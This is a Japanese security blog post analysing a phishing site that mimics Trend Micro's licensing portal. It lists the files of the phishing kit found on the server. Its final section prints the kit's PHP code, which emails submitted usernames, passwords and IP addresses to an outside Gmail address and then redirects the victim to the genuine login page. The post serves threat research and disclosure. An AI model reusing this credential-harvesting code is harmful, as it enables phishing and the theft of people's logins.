piyolog

トレンドマイクロのライセンス情報の登録などを行うポータルを騙ったフィッシング詐欺サイトが発見されたとTwitterで投稿がありました。ボリビアの企業サイトが改ざんされ、詐欺サイトが設置されているように見受けられます。ここではこのフィッシング詐欺サイトを調べた情報をまとめます。

トレンドマイクロのユーザー狙い？

f:id:piyokango:20191210060554p:plain — Customer Licensing Portalにそっくりな画面

ID（メールアドレス）、パスワードの窃取を目的としたもの。氏名、住所やクレジットカード情報を入力する画面は確認されず。
「Sign In」クリック後は正規のトレンドマイクロ社のポータルサイトtm.login.trendmicro.comに遷移する。フィッシング詐欺サイトは入力チェックもしていないので、何も入力せずクリックしても正規サイトへ飛ばされる。
表記は英語のみ。正規サイトは日本語圏から接続すると日本語表示となる。
Twitterでの報告を確認したもので、このサイトへ誘導するメール等はpiyokangoは確認していない。

同ディレクトリにZIPファイル

f:id:piyokango:20191210061115p:plain — ZIPファイルを確認

フィッシング詐欺サイトが設置されたサーバーはディレクトリリスティングが可能な状態だった。
詐欺サイトが設置されたディレクトリのリスト中に「trendmicro.zip」というZIPファイルも存在。
ZIPファイルの中身は今回設置されていたトレンドマイクロのフィッシング詐欺のキットとみられる複数のファイルが内包されていた。
表記された日付からフィッシング詐欺サイトも2019年12月9日に設置されたものとみられる。

ZIPファイルの中身

ZIPファイルの中身は以下の通り。HTML、PHP、JS、画像ファイルより構成。

11chl9h0dh4r03207qtn02jtal.js
1gnqei9vzyqfsctmvmuo5cjak.html
1jkxoqpv5dmupdmpkzc88ep2k.html
1xhj00viv3sva3v48xd92mko3b.html
21exo0es9ladq1tsnxooq4uwsw.png
267qlbmayc34p19fuvhe4g8qt9.js
2bbi2mfvcc4ig2v9vdnps4sfsc.js
2tojra4fztxc63ef10u0o87fn9.gif
2zoenq7wgq71022lc0blseyick.gif
3oizs390zzaun166vf0a7k1cbb.png
4o6g0hav1mjp1j4axk0huy6x8.png
biz.php
index.html
screenshot.png
screenshot_thumb.png
screenshot_thumb@2x.png
static.html

入力後にメール送信するPHP

「biz.php」はGmailアドレスfegrapuoltry3@gmail.comに対し、入力されたメールアドレス、パスワードを送信。その後トレンドマイクロの正規サイトへリダイレクトさせるもの。
Created BY GPAという表記が見受けられる。

$ip = getenv("REMOTE_ADDR");
$message .= "--------------New Login--------\n";
$message .= "Email-ID : ".$_POST['username']."\n";
$message .= "Password : ".$_POST['password']."\n";
$message .= "Client IP : ".$ip."\n";
$message .= "---------------Created BY GPA-----------\n";
$send = "fegrapuoltry3@gmail.com";
$subject = "--New Log $ip -- Source:(trendmicro.com)";

mail($send,$subject,$message,$headers);

$redirect = "https://tm.login.trendmicro.com/authenticate/api/true?retryURL=https%3A%2F%2Ftm.login.trendmicro.com%2Fsimplesaml%2Fmodule.php%2Fcore%2Floginuserpass.php";

header("Location: " . $redirect);